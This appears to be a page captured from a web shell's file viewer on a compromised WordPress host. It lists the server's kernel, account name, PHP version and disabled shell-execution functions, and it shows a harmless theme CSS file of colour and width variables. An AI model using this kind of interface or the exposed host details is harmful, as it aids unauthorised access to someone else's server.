HEX
Server: Apache/2
System: Linux cp07.iserverteam.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: fliyingp (1085)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/fliyingp/domains/fliyingpigeon.hk/public_html/wp-content/themes/ocean-theme/vars.css
:root {
  --container-width: 100%;
  --container-padding: 16px;
  --font-main: var(--font-family);
  --font-accent: var(--second-family);
  --text-color: var(--main-white);
  --font-family: "Helvetica Neue", sans-serif;
  --second-family: "Gilroy", sans-serif;
  --page-bg: var(--main-black);
  --main-white: #fff;
  --main-yellow: #fed500;
  --main-black: #010101;
  --input-bg: #121212;
  --caret-color: var(--main-yellow);
}
@media (min-width: 768px) {
  :root {
    --container-width: 736px;
  }
}
@media (min-width: 1024px) {
  :root {
    --container-width: 1024px;
  }
}
@media (min-width: 1440px) {
  :root {
    --container-width: 1408px;
  }
}
@media (min-width: 1920px) {
  :root {
    --container-width: 1600px;
  }
}